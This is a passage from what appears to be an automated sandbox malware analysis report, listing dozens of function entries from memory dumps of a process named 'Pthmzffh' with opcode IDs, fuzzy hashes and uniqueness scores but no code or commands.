                                                                      Function 022BFA39 Relevance: .0, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a5d3244a8157839130a8ae43809f0a671567d14905517badb8f323d9eff89644
                                                                      • Instruction ID: 0f63809b15503badeac5c3d83b4dc845208c34d91c5bc6065453c89a3c0ba385
                                                                      • Opcode Fuzzy Hash: a5d3244a8157839130a8ae43809f0a671567d14905517badb8f323d9eff89644
                                                                      • Instruction Fuzzy Hash: CFD0A7B55145404FC351C2148C96486BF60DE5A244755C08EC045CB143D633C907CB86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022BAC61 Relevance: .0, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f06422cd2a8c096deb50f849ad662c67ab8df5a0d58cd2200d01f8720e44e187
                                                                      • Instruction ID: dfaa9ec184b37c3be8bd00a815797f1b420fa3fcb766053753509101bea5402a
                                                                      • Opcode Fuzzy Hash: f06422cd2a8c096deb50f849ad662c67ab8df5a0d58cd2200d01f8720e44e187
                                                                      • Instruction Fuzzy Hash: 82D0A9A42085801FC341CA11DCD5886BFB4DBCA208304C09AD48DCB212EA22C803CB96
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B5CE3 Relevance: .0, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e033ca3510ec734ea1e0a667a0b46775d99e21531a8d7119a597b65abd9f2a96
                                                                      • Instruction ID: c560943c554e123ebbd78cbcac5f96e7721670f675764b19151da110f4dc1bf5
                                                                      • Opcode Fuzzy Hash: e033ca3510ec734ea1e0a667a0b46775d99e21531a8d7119a597b65abd9f2a96
                                                                      • Instruction Fuzzy Hash: 85D05E7290010CAF8B02DFE489105DEBBFDDA45200B1041E6D90897111EA319B94A781
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A72C92 Relevance: .0, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fea58dffb18d1c19b62f9b1316f987c976af142106dbfcc75907faa267acf0fe
                                                                      • Instruction ID: 5bd2a3f51f6b875d6932c21990387bfb539a6ec28f589a7577cd06cac1b4a4f4
                                                                      • Opcode Fuzzy Hash: fea58dffb18d1c19b62f9b1316f987c976af142106dbfcc75907faa267acf0fe
                                                                      • Instruction Fuzzy Hash: B1D09E762001586F9B45CE88D850CB67B69EB89220714C45AFD59C7251C672DD22DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A36D98 Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 891404b69d14361e832ad65b38f908a3ad0007eb3379c255b439e5f12c7c51f1
                                                                      • Instruction ID: 0c60ea3408d8dcd47a47a11347b8a5d011f4bc4aa3264937fad007c5cd2cb78e
                                                                      • Opcode Fuzzy Hash: 891404b69d14361e832ad65b38f908a3ad0007eb3379c255b439e5f12c7c51f1
                                                                      • Instruction Fuzzy Hash: 3AD0A9A55192801FD3218334CC82882BFE4AA96200B29C4BEC880CB187CA21A9479752
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B9008 Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d796c5837475cb0ece45562c08d9abfeabd77ea76312aee75fe0c7c7f8c3ec4a
                                                                      • Instruction ID: d8f04afc607159234591bada11b7128fb62eb1822b31d3450f260c00a66bbb49
                                                                      • Opcode Fuzzy Hash: d796c5837475cb0ece45562c08d9abfeabd77ea76312aee75fe0c7c7f8c3ec4a
                                                                      • Instruction Fuzzy Hash: FAD023715101014FC381C5A48CCD485F751CB66344311C0B9C005CB167DB31C407D744
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B5068 Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9f8c5ab686f5b69eb6a3e437e58c416511dcc764e8e1f05d80c85edbb40f2899
                                                                      • Instruction ID: 88bfaf91d505ecbe221f83a4a1a856f56997480cf4f64c8df21f7e99f08c298c
                                                                      • Opcode Fuzzy Hash: 9f8c5ab686f5b69eb6a3e437e58c416511dcc764e8e1f05d80c85edbb40f2899
                                                                      • Instruction Fuzzy Hash: 06D0C9A4608340AFD301C624CCE1856FBE5EBD9314B26C89ED5C9D7262EA36DD1BC722
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022BC152 Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7d5cd597a6975104b1edefdfafbfc80544038e9e2fc97c00b67ffadd269d50df
                                                                      • Instruction ID: 8f514a51e6d03a8a259412f6162dad82fdb188acfd06d9d4ae3460278a0a7d26
                                                                      • Opcode Fuzzy Hash: 7d5cd597a6975104b1edefdfafbfc80544038e9e2fc97c00b67ffadd269d50df
                                                                      • Instruction Fuzzy Hash: 3ED0A9B26042028FD298CB00DC819AAB362EBD4300B08C86EE81047304CE328C03C790
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022BA578 Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bde3ea7239059b2bf99d2bef752af16bcf43c790bb84c0c81078920bb527c361
                                                                      • Instruction ID: 83c1d26b17c5672989e80b955f68bdfaa5f92fe0a81516211ea2009caf0281d6
                                                                      • Opcode Fuzzy Hash: bde3ea7239059b2bf99d2bef752af16bcf43c790bb84c0c81078920bb527c361
                                                                      • Instruction Fuzzy Hash: 5ED0A9B12196408FC381C6248CA688BFFA0EB6A208B16848AC0448F243E6228907C392
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022BDB58 Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fb1cdedad57d66b2c18839cca1aaa6781f4aaf7b0f5b7745c3ceb5468a5334f4
                                                                      • Instruction ID: ca0cf4c3d93347f8761c6d84ce443daea2e147d0ff5fa01a0c82d2f4825d6763
                                                                      • Opcode Fuzzy Hash: fb1cdedad57d66b2c18839cca1aaa6781f4aaf7b0f5b7745c3ceb5468a5334f4
                                                                      • Instruction Fuzzy Hash: 25D0A7F09092405FC384C7148D4D856FBA4DF5A208715C4DAD049CF163CA318507C725
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B99E0 Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 623f47807d63b968df779ce5c702ab3047942358ee1ad17ea2c1f2792e672937
                                                                      • Instruction ID: 47d4a7e028a91da7520d8bc90cbd8c0c3481988c66af29936bb0347e53d9c905
                                                                      • Opcode Fuzzy Hash: 623f47807d63b968df779ce5c702ab3047942358ee1ad17ea2c1f2792e672937
                                                                      • Instruction Fuzzy Hash: E6D023A3C5400477C303DDC0D5447D537C5EB623C4F1005D5D54945124E721571B8B93
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022BBC08 Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0fb3daf31e40edb851331a2ae5d0ce66aad492da5c72fa193934a98d42769069
                                                                      • Instruction ID: d8c5c9a3455cd27d1d049c67d1632070943a4ee9bd5df3b767887e43c1c83b58
                                                                      • Opcode Fuzzy Hash: 0fb3daf31e40edb851331a2ae5d0ce66aad492da5c72fa193934a98d42769069
                                                                      • Instruction Fuzzy Hash: EAD022F2D211045FC3C0C714C88768ABB91DB6A200B4AC4A9C80A8F302DA318C0787DA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A35C80 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 693116a32dbd44c93e66b08b4fa9f777f24ef15196595865450ae62535d305ed
                                                                      • Instruction ID: 8d40afb4a07d1d2a30a774ccccadac811ba8054ba25b73b1174afcc52327c277
                                                                      • Opcode Fuzzy Hash: 693116a32dbd44c93e66b08b4fa9f777f24ef15196595865450ae62535d305ed
                                                                      • Instruction Fuzzy Hash: D8D0C97294120CEF9B42EFE4C90199EB7EDDB86214B1045A69509D7210EA319B546B91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A3EDCF Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 38e962b340ea24370119b153d303ae88a9e715a6c50c856c526fbd8e202fe423
                                                                      • Instruction ID: 60762f7548f8a54a951c1eb9525066d01cd10881cab1620d8c3342156c4eb055
                                                                      • Opcode Fuzzy Hash: 38e962b340ea24370119b153d303ae88a9e715a6c50c856c526fbd8e202fe423
                                                                      • Instruction Fuzzy Hash: F9D0C9B290210CAF8B42DFE0D9415DEBBF9DB85214B1145A6D609D7210EA318B546B91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A3EDD0 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a18dc31958ddf23d5c7496002318ebcba9d3d5e721ab526feedb4ff39de87795
                                                                      • Instruction ID: b9d86416c913a48c5c1621823836f41b95ec8055948b5e2bea5ecdfb2936cc9d
                                                                      • Opcode Fuzzy Hash: a18dc31958ddf23d5c7496002318ebcba9d3d5e721ab526feedb4ff39de87795
                                                                      • Instruction Fuzzy Hash: 4CD0C9B290120CAF8B42DFE4C90199EBBEDDB85214B1145A69609D7210EA319B546B91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A38FA0 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e9b2e7719c296bfb10054e5b4600243e910abf129e4a16a23eeb370a82240ad7
                                                                      • Instruction ID: 9ca0690195d6423c90ee00bf82da537b78bd43c47a12bd76d0e8ac68cd34bf5d
                                                                      • Opcode Fuzzy Hash: e9b2e7719c296bfb10054e5b4600243e910abf129e4a16a23eeb370a82240ad7
                                                                      • Instruction Fuzzy Hash: 93D0C9B290120CAF8F82DFE5C9019DFB7EDDB85204B1045A69509D7210EA319B54AB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A3C750 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fa987f9ba8fcdee493803b1353b7ece05226c81b5e1c455a7e98e46849a61ae1
                                                                      • Instruction ID: f7a5339b7e4162328135b2e92d26ff7be39943e6b6cec6d350ae53c8f86610c4
                                                                      • Opcode Fuzzy Hash: fa987f9ba8fcdee493803b1353b7ece05226c81b5e1c455a7e98e46849a61ae1
                                                                      • Instruction Fuzzy Hash: 38D022B13A01006FC242C220C842C0BBFA2CBEF210B26C0AAC4088F396C631DC078362
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A389E8 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e4819392c17670ee98cf72d5b605bc7ced88e9c4e1f797554e9781fe1aa86af5
                                                                      • Instruction ID: 147e09b63d0d27095e5883c9380d35a624ff72fa471bff8b5ff36ec75e85e099
                                                                      • Opcode Fuzzy Hash: e4819392c17670ee98cf72d5b605bc7ced88e9c4e1f797554e9781fe1aa86af5
                                                                      • Instruction Fuzzy Hash: 59D0C97294520CEF9B42DFE4C90199FBBEDDB85204F1045A69A09D7210EA319B54AB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A36120 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e83a3beddc67289c841ba528a5ca2333173bf5a54374ab56e29e34137e806c43
                                                                      • Instruction ID: f44e63bb72cd289901e529bd7d3084c8912fb85ea1ed673164c1b383b79ff4d7
                                                                      • Opcode Fuzzy Hash: e83a3beddc67289c841ba528a5ca2333173bf5a54374ab56e29e34137e806c43
                                                                      • Instruction Fuzzy Hash: 5ED0C972D0120CAF8B42DFE4C90199EBBEDDB85244B1045E6D509D7220EA319B546B91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A3CAC0 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3f4132b83c560b9d960e61fe8793f32a82849708fb8a7e9281e7c9a9c55cadba
                                                                      • Instruction ID: b4d095d166ac64ec76aaef66e3e267d53ff4b866d729767eeb84feec3ea9ff39
                                                                      • Opcode Fuzzy Hash: 3f4132b83c560b9d960e61fe8793f32a82849708fb8a7e9281e7c9a9c55cadba
                                                                      • Instruction Fuzzy Hash: ABD023791181409FC340C6308847446BF71DF7F100716C09AC4448B103C736D507D701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A36BA0 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 879feeea471d290ea292823ab5fe89f9f9eba675cec4d83526e5bbcdf98b331d
                                                                      • Instruction ID: b1b4fee445f4b68893352a6e7a7a729125831ffe090dcece9799d4bc11ff17de
                                                                      • Opcode Fuzzy Hash: 879feeea471d290ea292823ab5fe89f9f9eba675cec4d83526e5bbcdf98b331d
                                                                      • Instruction Fuzzy Hash: 63D0C97690120CAF8B42DFE4CD0199EB7EDEB85204B1045B69509D7210EA319B546B91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A33370 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0ee80990e184a36c222b1ab35e43715cb545e3026852fa5d4df4a4e1de11e23d
                                                                      • Instruction ID: 5cab954acd012b181394edc7bd2d59b8b4842d3de29b6964ea29d7096134fdb4
                                                                      • Opcode Fuzzy Hash: 0ee80990e184a36c222b1ab35e43715cb545e3026852fa5d4df4a4e1de11e23d
                                                                      • Instruction Fuzzy Hash: F3D0C97290120CAF8B42DFE4CD0199EB7EDDF85244B1045F6A509D7210EA319B546B92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022BC290 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d5b8992c29448189f49e5633c3d429185e3f3043a140d630fec26c1e4b5de2c7
                                                                      • Instruction ID: b76f9a4d8b66d72939bd2247876f5fa995cef6b0a715834f7e56c206629c4b92
                                                                      • Opcode Fuzzy Hash: d5b8992c29448189f49e5633c3d429185e3f3043a140d630fec26c1e4b5de2c7
                                                                      • Instruction Fuzzy Hash: 60D0C97290120CEF8B42DFE5C9819DEB7EDDB45205F1045A69609D7210EA31AB54AB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B5318 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 74171e7508df498a7afd68687c48c18b4bfe1c1ba00b5cbceadd93ec70b12d1c
                                                                      • Instruction ID: fda65b00e62eb39fb5c2a4a120e7769ab61650df9dfdc61eebb659336c74c825
                                                                      • Opcode Fuzzy Hash: 74171e7508df498a7afd68687c48c18b4bfe1c1ba00b5cbceadd93ec70b12d1c
                                                                      • Instruction Fuzzy Hash: ADD0C972D0120CEF8B42DFE4C90199FB7EDEB45204B1045E69509D7210EE319B546B92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B73A0 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e931dfbb3fde8c1f9114f9f691e08a57fe342bd48fb7d89ea6906af429fe09b0
                                                                      • Instruction ID: 7fd4a6612b0f6f63aa1b2181c3e5c1628aa92b389d3e99db65730a3350d9e4a3
                                                                      • Opcode Fuzzy Hash: e931dfbb3fde8c1f9114f9f691e08a57fe342bd48fb7d89ea6906af429fe09b0
                                                                      • Instruction Fuzzy Hash: 90D0C97290120CAF8F42DFE5C90199EB7FDDB45205F1045A69909E7210EE31AB546B92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B83B0 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 80c105b9d5e2b8bf1823e80eb545cd2367a1ea4d4acb0c0318f8a2b67d48bb8c
                                                                      • Instruction ID: 4669622d66f78af7a29f66d2ce1bf69d711e0a8533a9167196b1abf39ea4f10b
                                                                      • Opcode Fuzzy Hash: 80c105b9d5e2b8bf1823e80eb545cd2367a1ea4d4acb0c0318f8a2b67d48bb8c
                                                                      • Instruction Fuzzy Hash: 40D09E761081219F9644DF44E990856B7A1EBD4B14B14884DA45457314E672DC1BD7A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B8020 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e0ac9764f8cd9f8a841401261bf9fa56b4dc43a41e97eb53a83453208770bf56
                                                                      • Instruction ID: de91e4ffe866c37e421a50b426ccc4178ebf53cf18d07ec320ded0ac932e0b6a
                                                                      • Opcode Fuzzy Hash: e0ac9764f8cd9f8a841401261bf9fa56b4dc43a41e97eb53a83453208770bf56
                                                                      • Instruction Fuzzy Hash: 3AD0A97280020CEF8B02DFE4C8008DEB7EDDB40200F1040A68508D3220EA319B046B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B5040 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 157d2702e7da459bf38e19ff5b47e0afe65ac8cdc7f586abe43c59f092c6036b
                                                                      • Instruction ID: 2143bfd6e306d5d1f7a414971be0b321ec093eb9eef198913afa023f4fe826f8
                                                                      • Opcode Fuzzy Hash: 157d2702e7da459bf38e19ff5b47e0afe65ac8cdc7f586abe43c59f092c6036b
                                                                      • Instruction Fuzzy Hash: 8FD0C9B290120CEF8B42DFE4C90199EBBEDDB45204F1045A69509D7210EA31AB546B91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022BD1C9 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a577be98b8cd47e172070e4654e30c5e98a06443ec2abdf42e7d5fd6a370a20d
                                                                      • Instruction ID: c8d32dca8c5ad69f0c79041012d2e56ae503a9e0e4bde409befad3abe30f5cfc
                                                                      • Opcode Fuzzy Hash: a577be98b8cd47e172070e4654e30c5e98a06443ec2abdf42e7d5fd6a370a20d
                                                                      • Instruction Fuzzy Hash: F8D0C7701156409FC345D718D455846FFA4DF96114F59C8ADC585CB513D7369807CB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B8560 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
